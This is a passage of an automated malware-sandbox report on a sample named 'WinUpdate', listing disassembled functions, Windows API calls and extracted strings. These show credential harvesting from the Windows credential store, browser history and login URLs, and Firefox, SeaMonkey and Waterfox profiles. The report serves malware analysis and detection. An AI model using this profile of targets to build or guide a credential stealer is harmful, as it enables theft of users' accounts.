                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                                                                                • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                                                                                • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                                                                                • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                                                                                                                                                                • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                                                                                • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 115830560-3916222277
                                                                                                                                                                                                                                                                                                • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                                                                                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 789 41837f-4183bf 790 4183c1-4183cc call 418197 789->790 791 4183dc-4183ec call 418160 789->791 796 4183d2-4183d8 790->796 797 418517-41851d 790->797 798 4183f6-41840b 791->798 799 4183ee-4183f1 791->799 796->791 800 418417-418423 798->800 801 41840d-418415 798->801 799->797 802 418427-418442 call 41739b 800->802 801->802 805 418444-41845d CreateFileW 802->805 806 41845f-418475 CreateFileA 802->806 807 418477-41847c 805->807 806->807 808 4184c2-4184c7 807->808 809 41847e-418495 GetLastError free 807->809 812 4184d5-418501 memset call 418758 808->812 813 4184c9-4184d3 808->813 810 4184b5-4184c0 call 444706 809->810 811 418497-4184b3 call 41837f 809->811 810->797 811->797 819 418506-418515 free 812->819 813->812 819->797
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                                                                                • String ID: |A
                                                                                                                                                                                                                                                                                                • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                                                                                • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                                                                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                                                                                • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                                                                                • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                                                                                • String ID: r!A
                                                                                                                                                                                                                                                                                                • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                                                                                • Opcode ID: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                                                                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                                                                                • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                                                                                • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                                                                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                                                                                                                                                                                                                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                                                                                • String ID: BIN
                                                                                                                                                                                                                                                                                                • API String ID: 1668488027-1015027815
                                                                                                                                                                                                                                                                                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                                                                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                                                                                • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 697348961-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                                                                                                • API String ID: 3527940856-11920434
                                                                                                                                                                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                                                                                                • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                                                                                                • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                                                                                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004033B7
